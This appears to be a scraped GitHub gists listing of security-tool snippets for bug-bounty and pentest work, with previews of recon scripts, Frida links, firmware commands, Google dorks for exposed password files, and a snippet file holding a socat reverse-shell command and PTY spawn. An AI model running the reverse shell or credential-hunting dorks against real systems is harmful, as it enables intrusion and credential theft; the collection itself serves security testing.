This is a simple guide to perform javascript recon in the bugbounty
- The first step is to collect possibly several javascript files (
more files=more paths,parameters->more vulns)
Chase Jensen ruevaughn
ruevaughn
/ JavascriptRecon.md
Created
September 20, 2021 12:33
My Javascript Recon Process - BugBounty
ruevaughn
/ bountyscan_setup.sh
Created
September 20, 2021 12:39
— forked from random-robbie/bountyscan_setup.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| export DEBIAN_FRONTEND=noninteractive; | |
| echo "[*] Starting Install... [*]" | |
| echo "[*] Upgrade installed packages to latest [*]" | |
| echo -e "\nRunning a package upgrade...\n" | |
| apt-get -qq update && apt-get -qq dist-upgrade -y | |
| apt full-upgrade -y | |
| apt-get autoclean | |
| echo "[*] Install stuff I use all the time [*]" |
ruevaughn
/ Frida Resource
Created
October 9, 2021 16:13
— forked from cyberheartmi9/Frida Resource
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://medium.com/android-news/hacking-android-app-with-frida-a85516f4f8b7 | |
| https://cmrodriguez.me/blog/frida-scripting-guide/ | |
| https://notsosecure.com/pentesting-android-apps-using-frida/ | |
| https://11x256.github.io/Frida-hooking-android-part-1 | |
| https://payatu.com/blog/amit/Getting%20_started_with_Frida | |
| https://zhuanlan.zhihu.com/p/157604388 | |
| https://corellium.com/blog/android-frida-finding-hooks | |
| https://frida.re/docs/javascript-api/ | |
| https://www.fatalerrors.org/a/java-runtime-for-advanced-usage-of-frida-hook-android-app.html | |
| https://www.nowsecure.com/blog/2017/04/27/owasp-ios-crackme-tutorial-frida/ |
ruevaughn
/ Firmware-Analysis
Created
October 9, 2021 16:15
— forked from cyberheartmi9/Firmware-Analysis
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| strings file | |
| binwalk -e file | |
| # mounting | |
| mknod /dev/mtdblock0 b 31 0 |
ruevaughn
/ GoogleHackMasterList.txt
Created
October 15, 2021 07:04
— forked from mylamour/GoogleHackMasterList.txt
The definitive super list for "Google Hacking".
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| admin account info" filetype:log | |
| !Host=*.* intext:enc_UserPassword=* ext:pcf | |
| "# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd | |
| "AutoCreate=TRUE password=*" | |
| "http://*:*@www” domainname | |
| "index of/" "ws_ftp.ini" "parent directory" | |
| "liveice configuration file" ext:cfg -site:sourceforge.net | |
| "parent directory" +proftpdpasswd | |
| Duclassified" -site:duware.com "DUware All Rights reserved" | |
| duclassmate" -site:duware.com |
ruevaughn
/ filetype.py
Created
October 15, 2021 07:04
— forked from dmgerman/filetype.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Copyright (C) 2013 The Debsources developers <[email protected]>. | |
| # See the AUTHORS file at the top-level directory of this distribution and at | |
| # https://anonscm.debian.org/gitweb/?p=qa/debsources.git;a=blob;f=AUTHORS;hb=HEAD | |
| # | |
| # This file is part of Debsources. Debsources is free software: you can | |
| # redistribute it and/or modify it under the terms of the GNU Affero General | |
| # Public License as published by the Free Software Foundation, either version 3 | |
| # of the License, or (at your option) any later version. For more information | |
| # see the COPYING file at the top-level directory of this distribution and at | |
| # https://anonscm.debian.org/gitweb/?p=qa/debsources.git;a=blob;f=COPYING;hb=HEAD |
ruevaughn
/ findNword.c
Created
October 15, 2021 07:12
— forked from dmgerman/findNword.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <assert.h> | |
| #include <string.h> | |
| #include <ctype.h> | |
| // return a pointer to the first character that does not satisfy the function f | |
| // or a pointer to the end of the string | |
| char *skip(char *st, int (f)(char)) |
ruevaughn
/ pet-snippet.toml
Created
October 17, 2021 14:57
— forked from rhamaa/pet-snippet.toml
description
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [[snippets]] | |
| description = "Python PTY Bash" | |
| command = "python -c 'import pty; pty.spawn(\"/bin/bash\")'" | |
| output = "\"\"" | |
| [[snippets]] | |
| description = "[Reverse Shell] Socat Reverse Shell" | |
| command = "socat file:`tty`,raw,echo=0 tcp-listen:<PORT=4444> #Listener socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<HOST>:<PORT=4444> #Victim" | |
| output = "\"\"" |
ruevaughn
/ nuclei-scan.sh
Created
October 17, 2021 21:04
— forked from dwisiswant0/nuclei-scan.sh
Automate nuclei for given hosts
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| OUT="~/nuclei-results/$1" | |
| TPL="~/nuclei-templates" | |
| mkdir -p ${OUT} | |
| SUB=$(subfinder -d $1 -silent | httprobe | tee ${OUT}/$1.txt) | |
| cd ${TPL}; git pull origin master && cd - | |
| for tpl in $(find $TPL -name "*.yaml"); do $GOPATH/bin/nuclei -l ${OUT}/$1.txt -t $tpl -o "${OUT}/$(basename "$tpl" .yaml).txt"; done | |
| find ${OUT} -name "*.txt" -size 0 -delete |
ruevaughn
/ genymotionwithplay.txt
Created
October 17, 2021 21:05
— forked from dwisiswant0/genymotionwithplay.txt
Genymotion with Google Play Services for ARM
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| NOTE: Easier way is the X86 way, described on https://www.genymotion.com/help/desktop/faq/#google-play-services | |
| Download the following ZIPs: | |
| ARM Translation Installer v1.1 (http://www.mirrorcreator.com/files/0ZIO8PME/Genymotion-ARM-Translation_v1.1.zip_links) | |
| Download the correct GApps for your Android version: | |
| Google Apps for Android 6.0 (https://www.androidfilehost.com/?fid=24052804347835438 - benzo-gapps-M-20151011-signed-chroma-r3.zip) | |
| Google Apps for Android 5.1 (https://www.androidfilehost.com/?fid=96042739161891406 - gapps-L-4-21-15.zip) | |
| Google Apps for Android 5.0 (https://www.androidfilehost.com/?fid=95784891001614559 - gapps-lp-20141109-signed.zip) |
OlderNewer